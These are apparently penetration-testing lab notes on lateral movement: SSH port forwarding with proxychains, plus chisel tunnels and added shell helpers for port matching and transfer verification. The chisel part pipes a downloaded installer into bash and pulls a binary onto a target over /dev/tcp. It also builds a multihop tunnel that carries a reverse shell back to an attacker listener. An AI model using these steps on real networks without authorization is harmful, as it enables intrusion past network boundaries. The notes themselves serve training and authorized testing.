Lateral Movement

SSH Tunneling

Dynamic Port Forwarding

Check which SOCKS port proxychains expects (9050 in the default config); the ssh -D port has to match it
tail /etc/proxychains.conf
Create a SOCKS proxy on that port (add -N -f to background it without opening a remote shell)
ssh charix@10.10.10.84 -D 9050
Now just prefix the tool with proxychains. The target address is resolved on the SSH host, so 127.0.0.1:5901 here is VNC on the target's own loopback (-passwd takes a password file):
proxychains vncviewer 127.0.0.1:5901 -passwd secret
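The two commands above only work together when the -D port equals the port in the proxychains config. The following is an added helper, not part of the original notes: it parses the [ProxyList] section of a proxychains.conf and prints the matching ssh command. The config content is constructed for the demo; user and host are the examples used above.

```shell
#!/usr/bin/env bash
# Added helpers, not from the original notes: read the SOCKS port that
# proxychains is configured for and build the matching `ssh -D` command,
# so the two ports cannot drift apart.

# Print the port of the first live socks4/socks5 entry under [ProxyList].
# Comment lines and everything above [ProxyList] are ignored.
proxychains_port() {
    awk '
        /^[[:space:]]*#/ { next }
        /^\[ProxyList\]/ { inlist = 1; next }
        inlist && /^[[:space:]]*socks[45][[:space:]]/ { print $3; exit }
    ' "$1"
}

# Print the ssh command for a SOCKS proxy on that port: -N runs no remote
# command, -f backgrounds after auth, and binding to 127.0.0.1 keeps the
# proxy off the attack box's other interfaces.
ssh_socks_cmd() {
    # $1 = user@host, $2 = path to proxychains.conf
    local port
    port=$(proxychains_port "$2")
    if [ -z "$port" ]; then
        echo "no socks entry in $2" >&2
        return 1
    fi
    printf 'ssh -N -f -D 127.0.0.1:%s %s\n' "$port" "$1"
}

# Constructed sample config: a commented-out socks5 line ahead of the live
# one, as in a config that has been edited once already.
sample_conf=$(mktemp)
cat > "$sample_conf" <<'EOF'
# proxychains.conf  VER 3.1
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# socks5 127.0.0.1 1080
socks4  127.0.0.1 9050
EOF

# Prints the command to run; nothing is connected here.
ssh_socks_cmd charix@10.10.10.84 "$sample_conf"
```

Run it, paste the printed command, then prefix the tool with proxychains as above. If the config has no socks entry the function fails instead of handing you a tunnel on the wrong port.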

Local Port Forwarding

ssh -L PORT:localhost:PORT user@remotehost.com
The first PORT is opened on your side; localhost:PORT is resolved on remotehost, so this reaches a service bound to the remote loopback.
Without interactive session (-N runs no remote command, -vv shows the forward being set up):
ssh -L 8080:127.0.0.1:8080 -N -vv User@RemoteHost

Remote Port Forwarding

ssh root@10.10.10.65 -R 4443:10.10.14.6:443
Connections to port 4443 on 10.10.10.65 come back to 10.10.14.6:443. Without a bind address sshd puts that listener on loopback only unless GatewayPorts is enabled.

chisel

Install chisel
The installer drops the binary in /usr/local/bin. It pipes a downloaded script into bash, so read it first or fetch a release binary from GitHub instead.
curl https://i.jpillora.com/chisel! | bash

Transfer chisel to a target

Copy the binary
cp /usr/local/bin/chisel .
Serve it with netcat (port 80 is rarely blocked outbound from a target)
nc -lvnp 80 < chisel

Now on the remote host

cd /var/tmp
cat < /dev/tcp/10.10.14.172/80 > chisel
From a host that has to go through an intermediate hop, or from a shell that is not bash (/dev/tcp is a bash feature), wrap it in bash -c and pull from the hop instead, here 172.19.0.4:7011:
bash -c "cat < /dev/tcp/172.19.0.4/7011 > chisel"
chmod 755 /var/tmp/chisel
cat returns only when the connection closes. If the listener does not close on EOF (OpenBSD nc needs -N, nc.traditional -q 1), Ctrl-C it once the file has arrived, then compare size or sha256 with the original: a dropped connection leaves a truncated file and no error.
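A raw nc//dev/tcp copy has no framing and no checksum, so the check worth doing is size plus hash on both ends. The following is an added example, not part of the original notes: fingerprint() runs on the attack box, verify_copy() on the target, and receive_and_verify() is the target-side pull from above with the check appended (it is defined but not run here, since it needs the listener). The stand-in file and its broken copies are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added helpers, not from the original notes. A raw TCP copy (nc on one end,
# /dev/tcp on the other) has no framing or checksum: if either side closes
# early the receiver gets a shorter file and no error. Fingerprint the binary
# on the attack box, then compare size and hash on the target.

# Print "<sha256> <bytes>" for a file. Falls back to shasum for hosts
# without coreutils sha256sum.
fingerprint() {
    local sum size
    if command -v sha256sum >/dev/null 2>&1; then
        sum=$(sha256sum "$1" | cut -d' ' -f1)
    else
        sum=$(shasum -a 256 "$1" | cut -d' ' -f1)
    fi
    size=$(wc -c < "$1" | tr -d ' ')
    printf '%s %s\n' "$sum" "$size"
}

# Compare a received file against the sender's fingerprint string.
# Exit status: 0 match, 1 size differs (truncated copy), 2 same size but
# different content.
verify_copy() {
    # $1 = received file, $2 = "<sha256> <bytes>" from fingerprint() on the sender
    local want_sum want_size got got_sum got_size
    want_sum=${2%% *}
    want_size=${2##* }
    got=$(fingerprint "$1")
    got_sum=${got%% *}
    got_size=${got##* }
    if [ "$got_size" != "$want_size" ]; then
        echo "$1: size $got_size, expected $want_size (truncated?)" >&2
        return 1
    fi
    if [ "$got_sum" != "$want_sum" ]; then
        echo "$1: sha256 mismatch" >&2
        return 2
    fi
    return 0
}

# Target side, matching the notes above: pull with bash's /dev/tcp (wrapped
# in bash -c in case the shell is sh), make it executable, verify.
# Not run here because it needs the listener on the attack box.
receive_and_verify() {
    # $1 = attacker ip, $2 = port, $3 = destination path, $4 = sender fingerprint
    bash -c "cat < /dev/tcp/$1/$2 > '$3'" && chmod 755 "$3" && verify_copy "$3" "$4"
}

# Constructed demo: a stand-in for the binary plus a truncated and a corrupted
# copy, the two failure modes a silent transfer can hand you.
demo_dir=$(mktemp -d)
seq 1 1000 > "$demo_dir/chisel"                               # 3893 bytes
head -c 3000 "$demo_dir/chisel" > "$demo_dir/chisel.short"    # dropped connection
sed '1s/^1$/7/' "$demo_dir/chisel" > "$demo_dir/chisel.bad"   # same size, one byte changed
expected=$(fingerprint "$demo_dir/chisel")

verify_copy "$demo_dir/chisel" "$expected" && echo "copy ok"
verify_copy "$demo_dir/chisel.short" "$expected" || echo "rejected, rc=$?"
verify_copy "$demo_dir/chisel.bad" "$expected" || echo "rejected, rc=$?"
```

On the attack box run fingerprint /usr/local/bin/chisel and paste its output as the last argument of receive_and_verify on the target, e.g. receive_and_verify 10.10.14.172 80 /var/tmp/chisel "<sha256> <bytes>"; a non-zero status means pull it again rather than run it.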

Create a tunnel

Start the server locally (-reverse lets clients open R: listeners on this side)
/usr/local/bin/chisel server -p 8002 -reverse -v
Start the tunnel remotely. The R: spec makes the server listen on 127.0.0.1:8001 on the attack box and push that traffic out of the client to 172.19.0.2:80; pinning the interface to 127.0.0.1 keeps the listener off your external interfaces:
/var/tmp/chisel client 10.10.14.172:8002 R:127.0.0.1:8001:172.19.0.2:80

Multihop tunnel for reverse shell

  • First start the new server on your attacking host:

/usr/local/bin/chisel server -p 5000 -reverse -v
  • Set also the listener for the shell:

nc -lvnp 9005
  • Now set the first hop (172.19.0.4). A plain local forward binds 0.0.0.0:6010 on the hop, so anything on that network can reach it, and points back at the chisel server on the attack box:

/var/tmp/chisel client 10.10.14.172:5000 6010:127.0.0.1:5000
  • Finally set the second hop. It reaches the chisel server through the first hop's 6010 rather than directly, and its port 7020 ends at the attacker's 127.0.0.1:9005:

/var/tmp/chisel client 172.19.0.4:6010 7020:127.0.0.1:9005 &
  • A reverse shell from the second hop to 127.0.0.1:7020 now lands on the nc listener.
